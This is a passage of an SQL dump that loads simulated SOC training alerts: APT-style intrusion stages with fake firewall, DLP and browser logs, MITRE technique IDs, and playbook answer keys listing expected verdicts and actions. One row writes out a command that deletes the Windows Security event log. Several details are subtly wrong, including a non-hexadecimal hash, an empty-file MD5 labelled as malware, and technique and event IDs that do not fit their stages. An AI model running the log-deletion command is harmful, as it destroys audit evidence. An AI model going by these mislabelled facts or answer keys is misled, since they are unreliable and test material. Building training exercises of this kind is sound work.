movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Known administrative account used in lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash of a tool commonly used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(323, 'Data Exfiltration Attempt', 'high', 'Firewall Logs', 'APT10 attempts to exfiltrate the gathered data using encrypted channels to evade detection by security mechanisms, completing their operation.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:16Z\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"action\":\"allow\",\"bytes_sent\":10485760,\"username\":\"internal_user\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filenames\":[\"confidential_data.zip\"],\"firewall_rule\":\"Allow_HTTPS_Traffic\",\"geo_location\":\"External - United States\",\"alerts\":[\"Large data transfer detected\",\"Suspicious outbound connection\"]}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent malware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(324, 'Suspicious Network Traffic Detected', 'high', 'Firewall Logs', 'Unusual outbound traffic patterns detected from the enterprise firewall, possibly indicating unauthorized access attempts. The traffic originates from an internal IP and targets an external IP known for hosting malicious content. This activity suggests the initial access phase of an intrusion operation.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":44321,\"dst_port\":8080,\"action\":\"allowed\",\"username\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"suspicious_payload.exe\",\"bytes_out\":10240,\"bytes_in\":2048}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the suspected compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash related to a suspicious file payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"suspicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File name indicative of malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(325, 'Malicious Firmware Update Detected', 'critical', 'Firewall Management Console', 'A rogue firmware update was installed on the firewall, allowing the attacker to execute code at a low level. Immediate action is required to mitigate potential threats.', 'Execution', 'T1496', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_type\":\"firmware_update\",\"source_ip\":\"185.143.223.91\",\"destination_ip\":\"192.168.1.1\",\"user\":\"admin\",\"firmware_version\":\"v5.3.2\",\"action\":\"update_executed\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"update_file\":\"firmware_update_v5.3.2.bin\",\"status\":\"completed\",\"message\":\"Firmware update executed successfully. No errors reported.\",\"suspicious_indicators\":{\"source_ip\":\"185.143.223.91\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.91\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous targeted attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal firewall device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known malicious firmware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"firmware_update_v5.3.2.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Repository\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(326, 'Persistence Mechanism Established', 'critical', 'Firmware Integrity Checks', 'The implant modifies the SPI flash memory, embedding itself to persist through reboots. This ensures the implant survives reboots and OS re-installations.', 'Persistence', 'T1105: Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:08Z\",\"event_id\":\"FW-INT-CHK-2023\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"detected_hash\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"modified_firmware\":\"/dev/mtd0\",\"username\":\"admin\",\"alert_message\":\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\",\"severity\":\"Critical\",\"protocol\":\"SPI\",\"action_taken\":\"None\",\"firmware_version\":\"v1.4.3\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known firmware backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/dev/mtd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Critical firmware storage location.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Authentication Logs\",\"verdict\":\"clean\",\"details\":\"Standard administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(327, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'The attacker uses the compromised firewall to probe internal network components, seeking further access.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":3389,\"action\":\"allowed\",\"username\":\"compromised_user\",\"filename\":\"malicious_payload.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_id\":\"1001\",\"message\":\"Suspicious lateral movement detected from compromised firewall to internal systems.\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account showing unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File identified as malware by multiple antivirus engines.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"SHA256 Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL),
(328, 'Command and Control Channel Established', 'high', 'Network Intrusion Detection System', 'Encrypted traffic is observed between the compromised firewall and an external server, indicating active C2 communication.', 'C2 Communication', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:07Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TLS\",\"session_id\":\"3f4e1ab7c9d4\",\"encrypted_bytes\":1520,\"decrypted_bytes\":0,\"tls_version\":\"TLS 1.2\",\"cipher_suite\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"host\":\"compromised-firewall.local\",\"username\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_id\":\"C2-2023-0005\",\"malware_family\":\"APT29\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"},{\"type\":\"username\",\"value\":\"jdoe\"}]}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(329, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention System', 'Data packets containing sensitive information are detected being sent to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:37Z\",\"event_id\":\"EXF-20231015-002\",\"internal_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"filename\":\"confidential_report.pdf\",\"user\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"action\":\"blocked\",\"description\":\"Attempted data exfiltration detected and blocked by DLP system.\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(330, 'Privilege Escalation Detected', 'high', 'Access Logs', 'Unauthorized attempts to escalate privileges within the network were detected, indicating that the attacker is attempting to gain elevated access.', 'Privilege Escalation', 'T1068', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"username\":\"john_doe\",\"attempted_privilege\":\"Administrator\",\"previous_privilege\":\"Standard User\",\"process\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"status\":\"Failed\",\"message\":\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in previous suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(331, 'Attempt to Cover Tracks Detected', 'high', 'Log Monitoring System', 'An advanced attack has been detected where log files are being tampered with, indicating an attempt to erase evidence of an attack.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"4625\",\"system\":{\"hostname\":\"server01.internal.local\",\"ip_address\":\"192.168.1.15\"},\"user\":{\"username\":\"attacker_user\",\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"},\"action\":\"Delete\",\"target_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process\":{\"name\":\"cmd.exe\",\"id\":\"5604\",\"command_line\":\"cmd.exe /c del C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\"},\"network\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"TCP\",\"port\":\"445\"},\"hash\":{\"algorithm\":\"SHA256\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attack campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this hash.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(332, 'Internal Reconnaissance Detected', 'high', 'SIEM Alerts', 'The attacker performs scans and probes to map out the network and identify further targets. Advanced techniques were used to evade detection during reconnaissance activities.', 'Reconnaissance', 'T1046: Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"rec-2023-00123\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"scanned_ports\":[22,80,443,445],\"protocol\":\"TCP\",\"detected_tool\":\"nmap\",\"username\":\"admin\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"network_scan\",\"outcome\":\"success\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known scanning activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by scan.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with reconnaissance tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(333, 'Final Data Extraction Detected', 'critical', 'Data Exfiltration Monitoring', 'Large volumes of data are prepared for final exfiltration, marking the conclusion of the attack operation. Data transfer detected from internal network to an external IP linked with known malicious activity.', 'Exfiltration', 'T1020', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T14:45:00Z\",\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.99\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"action\":\"Data Transfer\",\"bytes_transferred\":104857600,\"indicator_of_compromise\":true}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"File hash found in recent suspicious activity reports.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches naming pattern of sensitive data archives.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(334, 'Compromised Website Detected', 'high', 'Web Proxy Logs', 'APT32 has injected malicious JavaScript into the human rights organization\'s website, setting the stage for the delivery of a malicious payload to site visitors.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:52Z\",\"client_ip\":\"192.168.1.105\",\"request_method\":\"GET\",\"host\":\"humanrights.org\",\"url\":\"/index.html\",\"referrer\":\"http://malicious-redirect.com/landing\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\",\"status_code\":200,\"response_size\":4521,\"malicious_js_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT32 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious JavaScript used by APT32\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-redirect.com/landing\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing campaigns and malware distribution\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(335, 'Obfuscated JavaScript Execution', 'high', 'Browser Security Logs', 'The obfuscated JavaScript payload is executed on visitor\'s browsers, preparing the system for malware deployment. This indicates the transition from web-based compromise to client-side infection.', 'Execution', 'T1059.007 - JavaScript', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:57Z\",\"event_id\":\"JS-Exec-20231015-143\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.15\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"script_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"affected_user\":\"jdoe\",\"script_name\":\"obfuscated_payload.js\",\"referrer\":\"http://malicious-example.com/landing\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel DB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known JavaScript exploit kit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"obfuscated_payload.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File name associated with obfuscated scripts used in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
